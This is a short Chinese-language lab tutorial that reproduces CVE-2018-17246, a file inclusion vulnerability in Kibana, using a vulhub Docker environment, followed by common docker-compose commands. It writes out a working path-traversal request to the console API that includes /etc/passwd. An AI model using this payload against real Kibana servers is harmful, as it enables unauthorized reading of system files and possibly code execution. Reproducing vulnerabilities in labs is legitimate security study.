声明
好好学习,天天向上
漏洞描述
Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。此时,如果攻击者可以上传一个文件到服务器任意位置,即可执行代码。
影响范围
6.4.3之前版本
5.6.13之前
复现过程
这里使用5.6.12版本
使用vulhub
/app/vulhub-master/kibana/CVE-2018-17246
使用docker启动
docker-compose build
docker-compose up -d
环境启动后,访问
http://192.168.239.129:5601
访问
http://192.168.239.129:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
虽然在返回的数据包里只能查看到一个500的错误信息,但是我们通过执行docker-compose logs
即可发现,/etc/passwd
已经成功被包含:
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down